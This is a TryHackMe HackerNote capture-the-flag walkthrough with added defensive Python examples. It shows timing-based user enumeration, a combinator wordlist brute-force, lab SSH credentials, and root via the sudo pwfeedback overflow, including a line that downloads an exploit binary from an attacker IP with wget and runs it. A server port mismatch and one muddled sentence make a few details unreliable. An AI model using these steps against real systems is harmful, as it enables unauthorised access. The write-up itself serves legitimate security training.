TryHackMe HackerNote Write-Up: Exploitation, Privilege Escalation & Buffer Overflow Guide

1. Executive Summary:
This walkthrough details the process of exploiting a vulnerable Golang web application hosted on the TryHackMe HackerNote machine. It covers reconnaissance (gathering information), vulnerability analysis (finding weaknesses), exploitation (taking advantage of those weaknesses), and privilege escalation (gaining higher privileges), with the end goal of obtaining full control of the target system.

2. Methodology:
Reconnaissance: Initial information about the target machine was gathered, such as open ports and running services.
Vulnerability Analysis: Exploitable weaknesses in the Golang web application were identified.
Exploitation: The discovered vulnerabilities were used to gain initial access.
Privilege Escalation: More detailed enumeration was performed and a buffer overflow exploit was used to reach root access.

3. Reconnaissance:
Network Scanning:
Command run:

Results:
Open Ports:

    • Port 22 — SSH: OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    • Port 80 — HTTP: Golang net/http server (Go-IPFS JSON-RPC or InfluxDB API)
    • Port 8080 — HTTP: Golang net/http server (Go-IPFS JSON-RPC or InfluxDB API)

Services Detected:
Along with the service versions, some specific configurations were also identified that reveal possible entry points.

4. Scanning and Enumeration:

Service Enumeration:

HTTP Service:

Findings:
Discovered Directories/Files:

    * /index.html
    * /notes

Identifying these directories and files gave an idea of the web application's structure and provided information that was helpful for further exploitation.

5. Vulnerability Analysis:
Identified Vulnerabilities:

User Enumeration:
A test account was created and the application's responses were analysed when incorrect usernames and passwords were submitted. When a valid username was used, a timing delay was observed, which indicates that the username is valid; this made user enumeration possible.

Tools Used: Burp Suite (Python scripts can also be used).

Affected Service: Golang Web Application

Potential Impact: Attackers can systematically test different usernames to discover valid users.

Evidence: Discovered user: james
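The timing delay above is the classic symptom of a login routine that only runs its slow password hash when the username exists. The following Python is an added example, not code from the HackerNote application, showing that leaky shape beside a constant-work version, plus a counter and a timing harness that make the difference visible. The user table, the PBKDF2 cost and the password "blue7" are constructed for the example.

```python
import hashlib
import hmac
import os
import statistics
import time

# Constructed example: a password-check routine of the kind a login endpoint
# calls, in a deliberately leaky form and in a constant-work form.
ITERATIONS = 100_000  # constructed PBKDF2 cost; real deployments tune this

HASH_CALLS = 0  # counts slow-hash invocations so the leak is visible without a stopwatch


def hash_password(password: str, salt: bytes) -> bytes:
    """Slow password hash (PBKDF2-SHA256); every call is counted."""
    global HASH_CALLS
    HASH_CALLS += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user table with one account, mirroring the write-up's "james".
_SALT = os.urandom(16)
USERS = {"james": (_SALT, hash_password("blue7", _SALT))}

# A dummy record hashed once at start-up, so unknown usernames cost the same
# as known ones in the hardened variant.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("placeholder-not-a-real-password", _DUMMY_SALT)


def login_leaky(username: str, password: str) -> bool:
    """Vulnerable: unknown usernames return before the slow hash runs,
    so a valid username answers measurably slower than an invalid one."""
    if username not in USERS:
        return False
    salt, stored = USERS[username]
    return hmac.compare_digest(hash_password(password, salt), stored)


def login_constant_work(username: str, password: str) -> bool:
    """Hardened: always run the slow hash (against the dummy record when the
    user does not exist) and only then fold in the existence check."""
    salt, stored = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    matched = hmac.compare_digest(hash_password(password, salt), stored)
    return matched and username in USERS


def hash_calls_for(login, username: str) -> int:
    """Number of slow-hash calls one failed login attempt triggers."""
    global HASH_CALLS
    HASH_CALLS = 0
    login(username, "wrong-password")
    return HASH_CALLS


def timing_gap_ms(login, samples: int = 5) -> float:
    """Median response-time gap (ms) between a valid and an invalid username;
    this is the signal the write-up observed through Burp Suite."""
    def median_ms(username):
        times = []
        for _ in range(samples):
            start = time.perf_counter()
            login(username, "wrong-password")
            times.append((time.perf_counter() - start) * 1000)
        return statistics.median(times)
    return median_ms("james") - median_ms("nobody")


if __name__ == "__main__":
    for fn in (login_leaky, login_constant_work):
        print(f"{fn.__name__}: valid user -> {hash_calls_for(fn, 'james')} hash call(s), "
              f"unknown user -> {hash_calls_for(fn, 'nobody')} hash call(s), "
              f"timing gap {timing_gap_ms(fn):+.1f} ms")
```

Running the block prints one hash call for both usernames in the hardened variant and a timing gap near zero, while the leaky variant shows zero hash calls and a large negative-free gap for the unknown user. The existence check is folded in only after the hash so that the response body and status also stay identical for both cases.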

6. Exploitation:
Attack Vectors:

To exploit the discovered vulnerability, a wordlist was generated for brute-forcing the password in order to gain access to the web application.

Steps to Reproduce:

    1. Generate a wordlist:
      Using hashcat-utils, a wordlist was built from the "color + number" hint.

      ./combinator.bin ../../colors.txt ../../numbers.txt > ../../word.txt

    2. Use Burp Suite Intruder:
      In Burp Suite Intruder, select the password field and apply the generated wordlist for the brute-force attack.

    3. Log in:
      Log in to the web application with the discovered username (james) and the brute-forced password (blue7).

    4. Locate the SSH credentials:
      A note was found in the web app containing james's SSH credentials.
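For readers without hashcat-utils, the combinator step can be reproduced in a few lines of Python. This is an added example, not part of the original write-up or of hashcat-utils: it emits every left word followed by every right word in left-major order, the same ordering combinator.bin produces, and reports how many candidates the "color + number" hint yields so the brute-force effort can be sized before Intruder is started. The colour and number lists are constructed stand-ins for colors.txt and numbers.txt.

```python
from itertools import product
from pathlib import Path
import tempfile

# Constructed sample lists standing in for colors.txt and numbers.txt; the
# real files used in the write-up are not reproduced here.
COLORS = ["red", "green", "blue", "Blue"]
NUMBERS = [str(n) for n in range(10)]


def combine(left, right):
    """Yield every left word followed by every right word, in the
    left-major order that hashcat-utils' combinator produces."""
    for a, b in product(left, right):
        yield a + b


def candidate_count(left, right) -> int:
    """Size of the search space: one candidate per (left, right) pair."""
    return len(left) * len(right)


def write_wordlist(path, left, right) -> int:
    """Write the combinations to `path`, one per line, and return the count."""
    count = 0
    with open(path, "w", encoding="utf-8") as fh:
        for word in combine(left, right):
            fh.write(word + "\n")
            count += 1
    return count


def load_words(path):
    """Read a newline-separated wordlist, skipping blank lines."""
    text = Path(path).read_text(encoding="utf-8")
    return [line.strip() for line in text.splitlines() if line.strip()]


def build_from_files(colors_path, numbers_path, out_path) -> int:
    """File-based equivalent of:
    ./combinator.bin colors.txt numbers.txt > word.txt"""
    return write_wordlist(out_path, load_words(colors_path), load_words(numbers_path))


def demo_roundtrip():
    """Write the constructed lists to a temporary word.txt and read it back;
    returns (number written, whether 'blue7' is among the candidates)."""
    with tempfile.TemporaryDirectory() as tmp:
        out = Path(tmp) / "word.txt"
        written = write_wordlist(out, COLORS, NUMBERS)
        words = load_words(out)
    return written, "blue7" in words


if __name__ == "__main__":
    print(candidate_count(COLORS, NUMBERS), "candidates from the constructed lists")
    print(demo_roundtrip())
```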

Results:
Brute-forced Credentials:

    • Username: james
    • Web app password: blue7
    • SSH password: dak4ddb37b

7. Post-Exploitation:
Access Obtained:
Logged in successfully over SSH using the credentials james:dak4ddb37b.

Initial Enumeration:
The sudo -l command was used to check which sudo commands were available. Unfortunately, the current user could not run any commands as root. However, asterisks were displayed while the password was being typed, which does not happen by default.
This was an indication of the pwfeedback option being enabled, which is related to a recent CVE (CVE-2019-18634). Under specific conditions this vulnerability could be exploited via a buffer overflow.
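From the defender's side, the condition the asterisks reveal is a one-line check: CVE-2019-18634 only applies when sudo is older than 1.8.31 and pwfeedback is enabled in sudoers, so the fix is to upgrade sudo or add "Defaults !pwfeedback". The Python below is an added example, not code from the write-up, that parses sudoers-style text for that option (honouring comments and the rule that later Defaults lines override earlier ones) and reports the files that enable it. The sample sudoers snippets are constructed, not taken from the target machine.

```python
import glob
import re

# Constructed sample sudoers content (not taken from the target machine):
# the first enables password feedback, the second disables it, the third
# mentions it only in a comment.
SAMPLES = {
    "/etc/sudoers (constructed, vulnerable)": """
Defaults    env_reset
Defaults    pwfeedback
root    ALL=(ALL:ALL) ALL
""",
    "/etc/sudoers.d/hardened (constructed)": """
Defaults !pwfeedback
""",
    "/etc/sudoers.d/commented (constructed)": """
# Defaults pwfeedback   <- left disabled
Defaults mail_badpass
""",
}

# A Defaults line up to any trailing comment; also matches the
# Defaults:user / Defaults@host / Defaults!cmd forms.
DEFAULTS_LINE = re.compile(r"^\s*Defaults\b[^#]*")


def pwfeedback_state(text: str):
    """Return True if the text enables pwfeedback, False if it explicitly
    disables it, None if it never mentions the option. Later Defaults
    lines override earlier ones, as sudo applies them in order."""
    state = None
    for raw in text.splitlines():
        m = DEFAULTS_LINE.match(raw)
        if not m:
            continue
        parts = m.group(0).split(None, 1)
        body = parts[1] if len(parts) > 1 else ""
        for opt in body.split(","):
            opt = opt.strip()
            if opt == "pwfeedback":
                state = True
            elif opt == "!pwfeedback":
                state = False
    return state


def audit(files: dict) -> list:
    """Names of the files (name -> content) that enable pwfeedback."""
    return [name for name, text in files.items() if pwfeedback_state(text) is True]


def audit_system() -> list:
    """Read the live sudoers files (needs root) and audit them; files that
    cannot be read are skipped rather than reported."""
    contents = {}
    for path in ["/etc/sudoers"] + sorted(glob.glob("/etc/sudoers.d/*")):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                contents[path] = fh.read()
        except OSError:
            continue
    return audit(contents)


if __name__ == "__main__":
    print("constructed samples enabling pwfeedback:", audit(SAMPLES))
    print("live system files enabling pwfeedback:", audit_system())
```

The same logic is easy to fold into a configuration-compliance check: a host whose sudo version is below 1.8.31 and whose audit list is non-empty is the exact combination the walkthrough goes on to exploit.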

Data Retrieved:
Sensitive information was extracted from the target system, which proved helpful in advancing the attack.

8. Privilege Escalation:
Initial Access:
Initial access was obtained as the low-privilege user (james).

Enumeration for Escalation:
Tools Used: Buffer Overflow Proof-of-Concept (PoC) tool.
Findings: Potential privilege escalation paths were identified, including SUID binaries and misconfigurations.

Exploitation Steps:

    1. Clone the exploit repository:

    2. Compile the exploit:

      make exploit

    3. Serve the exploit over HTTP:

      python3 -m http.server 8000

    4. Download the exploit on the target:

      wget http://10.17.10.64/exploit

    5. Make the exploit executable:

      chmod +x exploit

    6. Execute the exploit:

      ./exploit

Hooray, got in as the root user!

Conclusion:
This walkthrough demonstrates essential skills such as reconnaissance, vulnerability analysis, and exploitation, which are crucial for understanding network security and web application flaws. These techniques align closely with the topics of the eJPT certification, so this exercise is excellent practice for sharpening your problem-solving and ethical hacking abilities.
